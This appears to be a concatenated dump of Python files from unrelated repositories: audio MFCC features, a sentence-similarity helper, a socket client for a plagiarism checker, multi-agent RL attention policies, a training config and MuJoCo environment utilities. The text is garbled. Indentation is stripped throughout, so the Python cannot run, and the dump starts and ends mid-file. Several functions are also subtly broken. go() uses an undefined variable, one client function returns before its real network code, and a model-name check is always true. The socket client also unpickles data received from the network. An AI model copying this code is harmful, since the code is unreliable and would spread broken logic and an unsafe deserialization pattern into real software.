def grad(frames):
_, lens = frames.shape
delta = np.abs(frames[:, 1:] - frames[:, :lens - 1])
return np.average(delta, axis=1).reshape(-1)
def relate(frames):
lens, _ = frames.shape
product = frames[:lens - 1, :] * frames[1:, :]
return np.average(product, axis=1).reshape(-1)
def compute_mfcc(signal, numcep=13, nfilt=26, split=10):
mfcc_feat = mfcc(signal, samplerate=44100, winlen=0.02, numcep=numcep, nfilt=nfilt, nfft=1024)
length = mfcc_feat.shape[0] / split
step = 0
feature = []
for i in range(split):
start = np.floor(step).astype('int')
end = np.ceil(step + length)
end = int(min(end, mfcc_feat.shape[0]))
feature.append(np.average(mfcc_feat[start:end, :], axis=0))
step += length
feature = np.hstack(feature)
return feature
```
#### File: NLP/Big_Homework/go.py
```python
from sentence_transformers import SentenceTransformer
import sklearn.preprocessing as prepro
import numpy as np
def go(s1: str, s2: str) -> float:
model = SentenceTransformer('multi-qa-MiniLM-L6-cos-v1')
model = model.cuda()
sentence_embeddings2 = model.encode(s2)
a = prepro.normalize(sentence_embeddings1)
b = prepro.normalize(sentence_embeddings2)
inlier_product = a.dot(b.T)
return (inlier_product[0,0])
```
#### File: NLPLarge/communication/Request.py
```python
import socket
import pickle
from .CheckResult import CheckResultPresentation as Result
import client as cli
def getBaseInfo(ip: str):
"""
获取基本信息,连接失败时候返回None
否则返回包含服务器信息的四元组
"""
address = (ip, 11451)
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
client.connect(address)
client.sendall(b'444')
data = client.recv(1024)
info = pickle.loads(data)
client.close()
return info
except BaseException:
client.close()
return None
def getServerInfo(ip: str, modelName: str, dataGroupName: str):
"""
获取模型信息及数据库信息
"""
address = (ip, 11451)
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
client.connect(address)
client.sendall(b'555')
data = client.recv(8)
if b'ok' == data:
key = pickle.dumps(modelName)
client.sendall(key)
data = client.recv(1024)
modelAddr = pickle.loads(data)
else:
client.close()
return None
client.sendall(b'666')
data = client.recv(8)
if b'ok' == data:
key = pickle.dumps(dataGroupName)
client.sendall(key)
data = client.recv(1024)
dataAddr = pickle.loads(data)
else:
client.close()
return None
client.close()
return (modelAddr, dataAddr)
except BaseException:
client.close()
return None
def duplicateResultGet(address: str, lines: list) -> list:
"""
收发查重包
"""
# TODO: 测试
import time
time.sleep(1)
tar = list(range(1, 17))
raw = cli.duplicateCheck(lines, tar, 0.6, 3)
parsed = cli.parse(raw, lines)
response = []
for i in parsed.values():
response.append(Result(*i))
return response
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
client.connect(address)
data = pickle.dumps(lines)
client.sendall(data)
data = client.recv(65536)
ret = pickle.loads(data)
client.close()
return [Result(it[0], it[1], it[2]) for it in ret]
except BaseException:
client.close()
return None
``` |
{
"source": "jiayu-ch15/curriculum",
"score": 2
} |
#### File: curriculum/algorithm/mpe_model.py
```python
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from utils.distributions import Bernoulli, Categorical, DiagGaussian
from utils.util import init
import copy
import math
class Policy(nn.Module):
def __init__(self, obs_space, action_space, num_agents, base = None, actor_base=None, critic_base=None, base_kwargs=None, device=torch.device("cpu")):
super(Policy, self).__init__()
self.mixed_obs = False
self.mixed_action = False
self.multi_discrete = False
self.device = device
self.num_agents = num_agents
self.args = base_kwargs
if base_kwargs is None:
base_kwargs = {}
self.actor_base = actor_base
self.critic_base = critic_base
@property
def is_recurrent(self):
return self.args['recurrent']
@property
def is_naive_recurrent(self):
return self.args['naive_recurrent']
def forward(self, share_inputs, inputs, rnn_hxs_actor, rnn_hxs_critic, masks):
raise NotImplementedError
def act(self, agent_id, share_inputs, inputs, rnn_hxs_actor, rnn_hxs_critic, masks, available_actions=None, deterministic=False):
share_inputs = share_inputs.to(self.device)
inputs = inputs.to(self.device)
rnn_hxs_actor = rnn_hxs_actor.to(self.device)
rnn_hxs_critic = rnn_hxs_critic.to(self.device)
masks = masks.to(self.device)
if available_actions is not None:
available_actions = available_actions.to(self.device)
dist = self.actor_base(inputs, self.num_agents)
if deterministic:
action = dist.mode()
else:
action = dist.sample()
action_log_probs = dist.log_probs(action)
action_out = action
action_log_probs_out = action_log_probs
value, rnn_hxs_actor, rnn_hxs_critic = self.critic_base(share_inputs, inputs, self.num_agents, rnn_hxs_actor, masks)
return value, action_out, action_log_probs_out, rnn_hxs_actor, rnn_hxs_critic
def get_value(self, agent_id, share_inputs, inputs, rnn_hxs_actor, rnn_hxs_critic, masks):
share_inputs = share_inputs.to(self.device)
inputs = inputs.to(self.device)
rnn_hxs_actor = rnn_hxs_actor.to(self.device)
rnn_hxs_critic = rnn_hxs_critic.to(self.device)
masks = masks.to(self.device)
value, rnn_hxs_actor, rnn_hxs_critic = self.critic_base(share_inputs, inputs, self.num_agents, rnn_hxs_actor, masks)
return value, rnn_hxs_actor, rnn_hxs_critic
def evaluate_actions(self, agent_id, share_inputs, inputs, rnn_hxs_actor, rnn_hxs_critic, masks, high_masks, action):
share_inputs = share_inputs.to(self.device)
inputs = inputs.to(self.device)
rnn_hxs_actor = rnn_hxs_actor.to(self.device)
rnn_hxs_critic = rnn_hxs_critic.to(self.device)
masks = masks.to(self.device)
high_masks = high_masks.to(self.device)
action = action.to(self.device)
dist = self.actor_base(inputs, self.num_agents)
action_log_probs = dist.log_probs(action)
dist_entropy = dist.entropy()
action_log_probs_out = action_log_probs
dist_entropy_out = dist_entropy.mean()
value, rnn_hxs_actor, rnn_hxs_critic = self.critic_base(share_inputs, inputs, self.num_agents, rnn_hxs_actor, masks)
return value, action_log_probs_out, dist_entropy_out, rnn_hxs_actor, rnn_hxs_critic
# for simple speaker listener
def act_role(self, agent_id, share_inputs, inputs, role, rnn_hxs_actor, rnn_hxs_critic, masks, available_actions=None, deterministic=False):
share_inputs = share_inputs.to(self.device)
inputs = inputs.to(self.device)
rnn_hxs_actor = rnn_hxs_actor.to(self.device)
rnn_hxs_critic = rnn_hxs_critic.to(self.device)
masks = masks.to(self.device)
if available_actions is not None:
available_actions = available_actions.to(self.device)
dist = self.actor_base(inputs, self.num_agents)
if deterministic:
action = dist.mode()
else:
action = dist.sample()
action_log_probs = dist.log_probs(action)
action_out = action
action_log_probs_out = action_log_probs
value, rnn_hxs_actor, rnn_hxs_critic = self.critic_base(share_inputs, inputs, self.num_agents, rnn_hxs_actor, masks)
return value, action_out, action_log_probs_out, rnn_hxs_actor, rnn_hxs_critic
def get_value_role(self, agent_id, share_inputs, inputs, role, rnn_hxs_actor, rnn_hxs_critic, masks):
share_inputs = share_inputs.to(self.device)
inputs = inputs.to(self.device)
rnn_hxs_actor = rnn_hxs_actor.to(self.device)
rnn_hxs_critic = rnn_hxs_critic.to(self.device)
masks = masks.to(self.device)
value, rnn_hxs_actor, rnn_hxs_critic = self.critic_base(share_inputs, inputs, self.num_agents, rnn_hxs_actor, masks)
return value, rnn_hxs_actor, rnn_hxs_critic
def evaluate_actions_role(self, agent_id, share_inputs, inputs, role, rnn_hxs_actor, rnn_hxs_critic, masks, high_masks, action):
share_inputs = share_inputs.to(self.device)
inputs = inputs.to(self.device)
rnn_hxs_actor = rnn_hxs_actor.to(self.device)
rnn_hxs_critic = rnn_hxs_critic.to(self.device)
masks = masks.to(self.device)
high_masks = high_masks.to(self.device)
action = action.to(self.device)
dist = self.actor_base(inputs, self.num_agents)
action_log_probs = dist.log_probs(action)
dist_entropy = dist.entropy()
action_log_probs_out = action_log_probs
dist_entropy_out = dist_entropy.mean()
value, rnn_hxs_actor, rnn_hxs_critic = self.critic_base(share_inputs, inputs, self.num_agents, rnn_hxs_actor, masks)
return value, action_log_probs_out, dist_entropy_out, rnn_hxs_actor, rnn_hxs_critic
class ATTBase_actor(nn.Module):
def __init__(self, num_inputs, action_space, agent_num, model_name, recurrent=False, hidden_size=64):
super(ATTBase_actor, self).__init__()
if recurrent:
num_inputs = hidden_size
init_ = lambda m: init(m, nn.init.orthogonal_, lambda x: nn.init.
constant_(x, 0), np.sqrt(2))
self.agent_num = agent_num
if model_name == 'simple_spread' or 'hard_spread':
self.actor = ObsEncoder_sp(hidden_size=hidden_size)
elif model_name == 'push_ball':
self.actor = ObsEncoder_pb(hidden_size=hidden_size)
num_actions = action_space.n
self.dist = Categorical(hidden_size, num_actions)
def forward(self, inputs, agent_num):
"""
inputs: [batch_size, obs_dim]
"""
hidden_actor = self.actor(inputs, agent_num)
dist = self.dist(hidden_actor, None)
return dist
class ATTBase_critic(nn.Module):
def __init__(self, num_inputs, agent_num, model_name, recurrent=False, hidden_size=64):
super(ATTBase_critic, self).__init__()
if recurrent:
num_inputs = hidden_size
init_ = lambda m: init(m, nn.init.orthogonal_, lambda x: nn.init.
constant_(x, 0), np.sqrt(2))
self.agent_num = agent_num
if model_name == 'simple_spread' or 'hard_spread':
self.encoder = ObsEncoder_sp(hidden_size=hidden_size)
elif model_name == 'push_ball':
self.encoder = ObsEncoder_pb(hidden_size=hidden_size)
self.correlation_mat = nn.Parameter(torch.FloatTensor(hidden_size,hidden_size),requires_grad=True)
nn.init.orthogonal_(self.correlation_mat.data, gain=1)
self.critic_linear = nn.Sequential(
init_(nn.Linear(hidden_size, hidden_size)), nn.Tanh(),
nn.LayerNorm(hidden_size),
init_(nn.Linear(hidden_size, 1)))
def forward(self, share_inputs, inputs, agent_num, rnn_hxs, masks):
"""
share_inputs: [batch_size, obs_dim*agent_num]
inputs: [batch_size, obs_dim]
"""
batch_size = inputs.shape[0]
obs_dim = inputs.shape[-1]
f_ii = self.encoder(inputs, agent_num)
obs_beta_ij = torch.matmul(f_ii.view(batch_size,1,-1), self.correlation_mat) # (batch,1,hidden_size)
# 矩阵f_ij
f_ij = self.encoder(share_inputs.reshape(-1,obs_dim),agent_num)
obs_encoder = f_ij.reshape(batch_size,agent_num,-1) # (batch_size, nagents, hidden_size)
beta = torch.matmul(obs_beta_ij, obs_encoder.permute(0,2,1)).squeeze(1) # (batch_size,nagents)
alpha = F.softmax(beta,dim = 1).unsqueeze(2) # (batch_size,nagents,1)
vi = torch.mul(alpha,obs_encoder)
vi = torch.sum(vi,dim = 1)
value = self.critic_linear(vi)
return value, rnn_hxs, rnn_hxs
class ObsEncoder_sp(nn.Module): # simple spread and hard spread
def __init__(self, hidden_size=100):
super(ObsEncoder_sp, self).__init__()
init_ = lambda m: init(m, nn.init.orthogonal_, lambda x: nn.init.
constant_(x, 0), np.sqrt(2))
self.self_encoder = nn.Sequential(
init_(nn.Linear(4, hidden_size)), nn.Tanh(), nn.LayerNorm(hidden_size))
self.other_agent_encoder = nn.Sequential(
init_(nn.Linear(2, hidden_size)), nn.Tanh(), nn.LayerNorm(hidden_size))
self.landmark_encoder = nn.Sequential(
init_(nn.Linear(3, hidden_size)), nn.Tanh(), nn.LayerNorm(hidden_size))
self.agent_correlation_mat = nn.Parameter(torch.FloatTensor(hidden_size,hidden_size),requires_grad=True)
nn.init.orthogonal_(self.agent_correlation_mat.data, gain=1)
self.landmark_correlation_mat = nn.Parameter(torch.FloatTensor(hidden_size,hidden_size),requires_grad=True)
nn.init.orthogonal_(self.landmark_correlation_mat.data, gain=1)
self.fc = nn.Sequential(
init_(nn.Linear(hidden_size, hidden_size)), nn.Tanh(),
nn.LayerNorm(hidden_size)
)
self.encoder_linear = nn.Sequential(
init_(nn.Linear(hidden_size * 3, hidden_size)), nn.Tanh(),
nn.LayerNorm(hidden_size),
init_(nn.Linear(hidden_size, hidden_size)), nn.Tanh(),
nn.LayerNorm(hidden_size)
)
# agent_num需要手动设置一下
def forward(self, inputs, agent_num):
batch_size = inputs.shape[0]
obs_dim = inputs.shape[-1]
landmark_num = agent_num
# landmark_num = int((obs_dim-4)/2)-2*(agent_num-1)
#landmark_num = int((obs_dim-4-4*(agent_num-1))/3)
self_emb = self.self_encoder(inputs[:, :4])
other_agent_emb = []
beta_agent = []
landmark_emb = []
beta_landmark = []
#start = time.time()
agent_beta_ij = torch.matmul(self_emb.view(batch_size,1,-1), self.agent_correlation_mat)
landmark_beta_ij = torch.matmul(self_emb.view(batch_size,1,-1), self.landmark_correlation_mat)
for i in range(agent_num - 1):
other_agent_emb.append(inputs[:, 4+3*landmark_num+2*i:4+3*landmark_num+2*(i+1)])
for i in range(landmark_num):
landmark_emb.append(inputs[:, 4+3*i:4+3*(i+1)])
other_agent_emb = torch.stack(other_agent_emb,dim = 1) #(batch_size,n_agents-1,eb_dim)
other_agent_emb = self.other_agent_encoder(other_agent_emb)
beta_agent = torch.matmul(agent_beta_ij, other_agent_emb.permute(0,2,1)).squeeze(1)
landmark_emb = torch.stack(landmark_emb,dim = 1) #(batch_size,n_agents-1,eb_dim)
landmark_emb = self.landmark_encoder(landmark_emb)
beta_landmark = torch.matmul(landmark_beta_ij, landmark_emb.permute(0,2,1)).squeeze(1)
alpha_agent = F.softmax(beta_agent,dim = 1).unsqueeze(2)
alpha_landmark = F.softmax(beta_landmark,dim = 1).unsqueeze(2)
other_agent_vi = torch.mul(alpha_agent,other_agent_emb)
other_agent_vi = torch.sum(other_agent_vi,dim=1)
landmark_vi = torch.mul(alpha_landmark,landmark_emb)
landmark_vi = torch.sum(landmark_vi,dim=1)
gi = self.fc(self_emb)
f = self.encoder_linear(torch.cat([gi, other_agent_vi, landmark_vi], dim=1))
return f
class ObsEncoder_pb(nn.Module): # push ball
def __init__(self, hidden_size=100):
super(ObsEncoder_pb, self).__init__()
init_ = lambda m: init(m, nn.init.orthogonal_, lambda x: nn.init.
constant_(x, 0), np.sqrt(2))
self.self_encoder = nn.Sequential(
init_(nn.Linear(4, hidden_size)), nn.Tanh(), nn.LayerNorm(hidden_size))
self.landmark_encoder = nn.Sequential(
init_(nn.Linear(3, hidden_size)), nn.Tanh(), nn.LayerNorm(hidden_size))
self.adv_encoder = nn.Sequential(
init_(nn.Linear(2, hidden_size)), nn.Tanh(), nn.LayerNorm(hidden_size))
self.good_encoder = nn.Sequential(
init_(nn.Linear(2, hidden_size)), nn.Tanh(), nn.LayerNorm(hidden_size))
self.adv_correlation_mat = nn.Parameter(torch.FloatTensor(hidden_size,hidden_size),requires_grad=True)
nn.init.orthogonal_(self.adv_correlation_mat.data, gain=1)
self.good_correlation_mat = nn.Parameter(torch.FloatTensor(hidden_size,hidden_size),requires_grad=True)
nn.init.orthogonal_(self.good_correlation_mat.data, gain=1)
self.landmark_correlation_mat = nn.Parameter(torch.FloatTensor(hidden_size,hidden_size),requires_grad=True)
nn.init.orthogonal_(self.landmark_correlation_mat.data, gain=1)
self.fc = nn.Sequential(
init_(nn.Linear(hidden_size, hidden_size)), nn.Tanh(), nn.LayerNorm(hidden_size))
self.encoder_linear = nn.Sequential(
init_(nn.Linear(hidden_size * 4, hidden_size)), nn.Tanh(),
nn.LayerNorm(hidden_size),
init_(nn.Linear(hidden_size, hidden_size)), nn.Tanh(),
nn.LayerNorm(hidden_size))
def forward(self, inputs, agent_num):
batch_size = inputs.shape[0]
obs_dim = inputs.shape[-1]
emb_self = self.self_encoder(inputs[:, :4])
adv_num = agent_num
good_num = agent_num
landmark_num = agent_num
emb_adv = []
beta_adv = []
emb_good = []
beta_good = []
emb_landmark = []
beta_landmark = []
beta_adv_ij = torch.matmul(emb_self.view(batch_size,1,-1), self.adv_correlation_mat)
beta_good_ij = torch.matmul(emb_self.view(batch_size,1,-1), self.good_correlation_mat)
beta_landmark_ij = torch.matmul(emb_self.view(batch_size,1,-1), self.landmark_correlation_mat)
for i in range(adv_num-1):
emb_adv.append(inputs[:, 4+2*i:4+2*(i+1)])
good_offset = 4 + 2*(adv_num-1)
for i in range(good_num):
emb_good.append(inputs[:, good_offset+2*i:good_offset+2*(i+1)])
landmark_offset = 4 + 2*(adv_num-1) + 2*good_num
for i in range(landmark_num):
emb_landmark.append(inputs[:, landmark_offset+3*i:landmark_offset+3*(i+1)])
emb_adv = torch.stack(emb_adv,dim = 1) #(batch_size,n_agents-1,eb_dim)
emb_adv = self.adv_encoder(emb_adv)
beta_adv = torch.matmul(beta_adv_ij, emb_adv.permute(0,2,1)).squeeze(1)
emb_good = torch.stack(emb_good,dim = 1) #(batch_size,n_agents-1,eb_dim)
emb_good = self.good_encoder(emb_good)
beta_good = torch.matmul(beta_good_ij, emb_good.permute(0,2,1)).squeeze(1)
emb_landmark = torch.stack(emb_landmark,dim = 1) #(batch_size,n_agents-1,eb_dim)
emb_landmark = self.landmark_encoder(emb_landmark)
beta_landmark = torch.matmul(beta_landmark_ij, emb_landmark.permute(0,2,1)).squeeze(1)
alpha_adv = F.softmax(beta_adv,dim = 1).unsqueeze(2)
alpha_good = F.softmax(beta_good,dim = 1).unsqueeze(2)
alpha_landmark = F.softmax(beta_landmark,dim = 1).unsqueeze(2)
adv_vi = torch.mul(alpha_adv,emb_adv)
adv_vi = torch.sum(adv_vi,dim=1)
good_vi = torch.mul(alpha_good,emb_good)
good_vi = torch.sum(good_vi,dim=1)
landmark_vi = torch.mul(alpha_landmark,emb_landmark)
landmark_vi = torch.sum(landmark_vi,dim=1)
gi = self.fc(emb_self)
f = self.encoder_linear(torch.cat([gi, adv_vi, good_vi, landmark_vi], dim=1))
return f
```
#### File: jiayu-ch15/curriculum/config.py
```python
import argparse
def get_config():
# get the parameters
parser = argparse.ArgumentParser(description='MAPPO-sc.')
# prepare
parser.add_argument("--algorithm_name", type=str, default='mappo')
parser.add_argument("--load_algorithm_name", type=str, default='mappo')
parser.add_argument("--seed", type=int, default=1)
parser.add_argument("--cuda", action='store_false', default=True)
parser.add_argument("--cuda_deterministic", action='store_false', default=True)
parser.add_argument("--n_training_threads", type=int, default=12)
parser.add_argument("--n_rollout_threads", type=int, default=32)
parser.add_argument("--num_env_steps", type=int, default=10e6, help='number of environment steps to train (default: 10e6)')
# env
parser.add_argument("--env_name", type=str, default='batch1')
parser.add_argument("--load_num_agents", type=int, default=3)
parser.add_argument("--num_agents", type=int, default=3)
parser.add_argument("--share_reward", action='store_false', default=True)
# hanabi
parser.add_argument("--hanabi_name", type=str, default='Hanabi-Full-Minimal')
# mpe
parser.add_argument("--scenario_name", type=str, default='simple_spread')
parser.add_argument("--num_landmarks", type=int, default=3)
parser.add_argument("--num_good_agents", type=int, default=3)
parser.add_argument("--num_adversaries", type=int, default=1)
# evaluation
parser.add_argument("--historical_length", type=int, default=5)
# starcraft2
parser.add_argument("--map_name", type=str, default='3m')
# hide and seek
parser.add_argument("--task_type", type=str, default='all')
parser.add_argument("--num_seekers", type=int, default=1)
parser.add_argument("--num_hiders", type=int, default=1)
parser.add_argument("--num_boxes", type=int, default=1)
parser.add_argument("--num_ramps", type=int, default=1)
parser.add_argument("--num_food", type=int, default=0)
parser.add_argument("--floor_size", type=float, default=6.0)
parser.add_argument("--grid_size", type=int, default=30)
parser.add_argument("--fixed_door", action='store_false', default=True)
parser.add_argument("--spawn_obs", action='store_true', default=False)
parser.add_argument("--env_horizon", type=int, default=30)
# network
parser.add_argument("--share_policy", action='store_false', default=True, help='agent share the same policy')
parser.add_argument("--hidden_size", type=int, default=64)
parser.add_argument("--layer_N", type=int, default=1)
parser.add_argument("--use_ReLU", action='store_true', default=False)
parser.add_argument("--use_common_layer", action='store_true', default=False)
parser.add_argument("--use_popart", action='store_false', default=True)
parser.add_argument("--use_feature_popart", action='store_true', default=False)
parser.add_argument("--use_feature_normlization", action='store_true', default=False)
parser.add_argument("--use_orthogonal", action='store_false', default=True)
parser.add_argument("--multi_critic", action='store_true', default=False)
parser.add_argument("--critic_k", type=int, default=3)
# lstm
parser.add_argument("--naive_recurrent_policy", action='store_true', default=False, help='use a naive recurrent policy')
parser.add_argument("--recurrent_policy", action='store_false', default=True, help='use a recurrent policy')
parser.add_argument("--data_chunk_length", type=int, default=10)
parser.add_argument("--critic_full_obs", action='store_true', default=False)
# attn
parser.add_argument("--attn", action='store_true', default=False)
parser.add_argument("--attn_N", type=int, default=1)
parser.add_argument("--attn_size", type=int, default=64)
parser.add_argument("--attn_heads", type=int, default=4)
parser.add_argument("--dropout", type=float, default=0.0)
parser.add_argument("--use_average_pool", action='store_false', default=True)
# ppo
parser.add_argument("--ppo_epoch", type=int, default=15, help='number of ppo epochs (default: 4)')
parser.add_argument("--use_clipped_value_loss", action='store_false', default=True)
parser.add_argument("--clip_param", type=float, default=0.2, help='ppo clip parameter (default: 0.2)')
parser.add_argument("--num_mini_batch", type=int, default=1, help='number of batches for ppo (default: 32)')
parser.add_argument("--entropy_coef", type=float, default=0.01, help='entropy term coefficient (default: 0.01)')
parser.add_argument("--value_loss_coef", type=float, default=1, help='value loss coefficient (default: 0.5)')
parser.add_argument("--lr", type=float, default=5e-4, help='learning rate (default: 7e-4)')
parser.add_argument("--eps", type=float, default=1e-5, help='RMSprop optimizer epsilon (default: 1e-5)')
parser.add_argument("--weight_decay", type=float, default=0)
parser.add_argument("--use-max-grad-norm", action='store_true', default=False)
parser.add_argument("--max-grad-norm", type=float, default=20.0, help='max norm of gradients (default: 0.5)')
parser.add_argument("--use-gae", action='store_false', default=True, help='use generalized advantage estimation')
parser.add_argument("--gamma", type=float, default=0.99, help='discount factor for rewards (default: 0.99)')
parser.add_argument("--gae-lambda", type=float, default=0.95, help='gae lambda parameter (default: 0.95)')
parser.add_argument("--use-proper-time-limits", action='store_true', default=False, help='compute returns taking into account time limits')
parser.add_argument("--use_huber_loss", action='store_false', default=True)
parser.add_argument("--huber_delta", type=float, default=10.0)
parser.add_argument("--use_accumulate_grad", action='store_true', default=False)
parser.add_argument("--use_grad_average", action='store_true', default=False)
# replay buffer
parser.add_argument("--episode_length", type=int, default=200, help='number of forward steps in A2C (default: 5)')
parser.add_argument("--test_episode_length", type=int, default=200, help='number of forward steps in A2C (default: 5)')
# amigo
parser.add_argument("--teacher_entropy_coef", type=float, default=0.01, help='entropy term coefficient (default: 0.01)')
parser.add_argument("--teacher_lr", type=float, default=1e-3, help='learning rate (default: 7e-4)')
parser.add_argument("--episode_length_teacher", type=int, default=200, help='number of teacher steps')
parser.add_argument("--teacher_hidden_size", type=int, default=64)
# run
parser.add_argument("--use-linear-lr-decay", action='store_true', default=False, help='use a linear schedule on the learning rate')
# save
parser.add_argument("--save_interval", type=int, default=10)
# log
parser.add_argument("--log_interval", type=int, default=1)
# eval
parser.add_argument("--eval", action='store_true', default=False)
parser.add_argument("--eval_interval", type=int, default=1)
parser.add_argument("--eval_episodes", type=int, default=32)
# render
parser.add_argument("--save_gifs", action='store_true', default=False)
parser.add_argument("--ifi", type=float, default=0.333333)
parser.add_argument("--model_dir", type=str, default=None)
# variational curriculum learning
parser.add_argument("--del_switch", type=str, default='novelty', help="novelty means diversified, old means FIFO, random means random del")
parser.add_argument("--buffer_length", type=int, default=2000)
parser.add_argument("--h", type=float, default=1.0, help="h in the RBFkernel")
parser.add_argument("--epsilon", type=float, default=0.6, help="uniform noise")
parser.add_argument("--delta", type=float, default=0.6, help="gradient step")
parser.add_argument('--sol_prop', type=float, default=0.05, help="proportion of solved samples")
parser.add_argument('--B_exp', type=int, default=150, help="number of Bexp")
parser.add_argument('--Rmin', type=int, default=0.5, help="the lower bound of V")
parser.add_argument('--Rmax', type=int, default=0.95, help="the upper bound of V")
parser.add_argument('--fixed_interval', type=int, default=3, help='fixed episodes for training tasks')
parser.add_argument('--save_node',action='store_true', default=False)
parser.add_argument('--save_node_interval', type=int, default=10)
parser.add_argument('--archive_initial_length', type=int, default=1000)
parser.add_argument('--eval_number', type=int, default=1)
# entity progression
parser.add_argument('--threshold_next', type=float, default=0.9, help='theshold for next phase')
parser.add_argument('--decay_interval', type=int, default=30, help='decay the raito of the last phase')
parser.add_argument("--num_target", type=int, default=8, help='num_agents of the final phase')
# wandb
parser.add_argument('--use_wandb',action='store_true', default=False)
args = parser.parse_args()
return args
```
#### File: hns/envs/base.py
```python
import numpy as np
import logging
from mujoco_worldgen import Floor, WorldBuilder, WorldParams, Env
from envs.hns.wrappers.multi_agent import (SplitMultiAgentActions, SplitObservations,
SelectKeysWrapper)
from envs.hns.wrappers.util import DiscretizeActionWrapper, DiscardMujocoExceptionEpisodes
from envs.hns.wrappers.line_of_sight import AgentAgentObsMask2D
from envs.hns.modules.agents import Agents
from envs.hns.modules.walls import RandomWalls
from envs.hns.modules.objects import Boxes, Ramps
class Base(Env):
'''
Multi-agent Base Environment.
Args:
horizon (int): Number of steps agent gets to act
n_substeps (int): Number of internal mujoco steps per outer environment step;
essentially this is action repeat.
n_agents (int): number of agents in the environment
floor_size (float): size of the floor
grid_size (int): size of the grid that we'll use to place objects on the floor
action_lims (float tuple): lower and upper limit of mujoco actions
deterministic_mode (bool): if True, seeds are incremented rather than randomly sampled.
'''
def __init__(self, horizon=250, n_substeps=5, n_agents=2,
floor_size=6., grid_size=30,
action_lims=(-1.0, 1.0), deterministic_mode=False,
**kwargs):
super().__init__(get_sim=self._get_sim,
get_obs=self._get_obs,
action_space=tuple(action_lims),
horizon=horizon,
deterministic_mode=deterministic_mode)
self.n_agents = n_agents
self.metadata = {}
self.metadata['n_actors'] = n_agents
self.horizon = horizon
self.n_substeps = n_substeps
self.floor_size = floor_size
self.grid_size = grid_size
self.kwargs = kwargs
self.placement_grid = np.zeros((grid_size, grid_size))
self.modules = []
def add_module(self, module):
self.modules.append(module)
def _get_obs(self, sim):
'''
Loops through modules, calls their observation_step functions, and
adds the result to the observation dictionary.
'''
obs = {}
for module in self.modules:
obs.update(module.observation_step(self, self.sim))
# print('obs: ',obs)
return obs
def _get_sim(self, seed):
'''
Calls build_world_step and then modify_sim_step for each module. If
a build_world_step failed, then restarts.
'''
world_params = WorldParams(size=(self.floor_size, self.floor_size, 2.5),
num_substeps=self.n_substeps)
successful_placement = False
failures = 0
while not successful_placement:
if (failures + 1) % 10 == 0:
logging.warning(f"Failed {failures} times in creating environment")
builder = WorldBuilder(world_params, seed)
floor = Floor()
builder.append(floor)
self.placement_grid = np.zeros((self.grid_size, self.grid_size))
# successful_placement = np.all([module.build_world_step(self, floor, self.floor_size)
# for module in self.modules])
tmp_successful_placement = [module.build_world_step(self, floor, self.floor_size)
for module in self.modules]
successful_placement = np.all(tmp_successful_placement)
failures += 1
sim = builder.get_sim()
for module in self.modules:
module.modify_sim_step(self, sim)
return sim
def make_env(n_substeps=5, horizon=250, deterministic_mode=False, n_agents=2,
n_boxes=2, n_ramps=1):
'''
This make_env function is not used anywhere; it exists to provide a simple, bare-bones
example of how to construct a multi-agent environment using the modules framework.
'''
env = Base(n_agents=n_agents, n_substeps=n_substeps, horizon=horizon,
deterministic_mode=deterministic_mode)
env.add_module(RandomWalls(grid_size=30, num_rooms=4, min_room_size=6, door_size=2))
if n_boxes > 0:
env.add_module(Boxes(n_boxes=n_boxes))
if n_ramps > 0:
env.add_module(Ramps(n_ramps=n_ramps))
env.add_module(Agents(n_agents))
env.reset()
keys_self = ['agent_qpos_qvel']
keys_mask_self = ['mask_aa_obs']
keys_external = ['agent_qpos_qvel']
keys_mask_external = []
env = SplitMultiAgentActions(env)
env = DiscretizeActionWrapper(env, 'action_movement')
env = AgentAgentObsMask2D(env)
env = SplitObservations(env, keys_self + keys_mask_self)
env = SelectKeysWrapper(env, keys_self=keys_self,
keys_external=keys_external,
keys_mask=keys_mask_self + keys_mask_external,
flatten=False)
env = DiscardMujocoExceptionEpisodes(env)
return env
```
#### File: mujoco-worldgen/bin/examine.py
```python
import click
import logging
from mujoco_worldgen.util.envs import EnvViewer, examine_env
from mujoco_worldgen.util.path import worldgen_path
from mujoco_worldgen.util.parse_arguments import parse_arguments
logger = logging.getLogger(__name__)
# For more detailed on argv information, please have a look on
# docstring below.
@click.command()
@click.argument('argv', nargs=-1, required=False)
def main(argv):
'''
examine.py is used to display environments
Example uses:
bin/examine.py simple_particle
bin/examine.py examples/particle_gather.py
bin/examine.py particle_gather n_food=5 floorsize=5
bin/examine.py example_env_examine.jsonnet
'''
env_names, env_kwargs = parse_arguments(argv)
assert len(env_names) == 1, 'You must provide exactly 1 environment to examine.'
env_name = env_names[0]
examine_env(env_name, env_kwargs,
core_dir=worldgen_path(), envs_dir='examples', xmls_dir='xmls',
env_viewer=EnvViewer)
print(main.__doc__)
if __name__ == '__main__':
logging.getLogger('').handlers = []
logging.basicConfig(format='%(asctime)s %(message)s', level=logging.INFO)
main()
```
#### File: mujoco_worldgen/util/path.py
```python
from os.path import abspath, dirname, join
WORLDGEN_ROOT_PATH = abspath(join(dirname(__file__), '..', '..'))
def worldgen_path(*args):
"""
Returns an absolute path from a path relative to the mujoco_worldgen repository
root directory.
"""
return join(WORLDGEN_ROOT_PATH, *args)
```
#### File: mujoco_worldgen/util/types.py
```python
import functools
import inspect
import types
def enforce_is_callable(var, error_msg):
"""
Raises an exception with provided error_msg if the variable
is not a callable.
"""
if not callable(var):
raise TypeError(error_msg)
return var
def extract_top_level_class(module, subclass):
'''
Searches module for a top-level class (in terms if inheritence)
of type subclass.
:param module: module in which we search for subclass
:param subclass: subclass that we search for
:return: object of type subclass.
'''
extracted_classes = []
for key, value in module.items():
if isinstance(value, types.ClassType) and issubclass(value, subclass):
extracted_classes.append([key, value, 0])
# Get the class which is the most top level.
assert len(extracted_classes) > 0, "Couldn't extract %s from module: %s" % (subclass, module)
top_level = extracted_classes[0]
for i in range(len(extracted_classes)):
for j in range(len(extracted_classes)):
if issubclass(extracted_classes[i][1], extracted_classes[j][1]):
extracted_classes[i][2] += 1
if extracted_classes[i][2] > top_level[2]:
top_level = extracted_classes[i]
return top_level[1]
def extract_matching_arguments(fun, kwargs):
# Extracts subset of kwargs that contains arguments present in signature of fun.
assert callable(fun), "First argument to extract_matching_arguments should be a function."
assert isinstance(kwargs, dict), "Second argument to extract_matching_arguments should be a dictionary of arugments"
fun_handler = fun
while hasattr(fun_handler, "__wrapped__") or inspect.isclass(fun_handler):
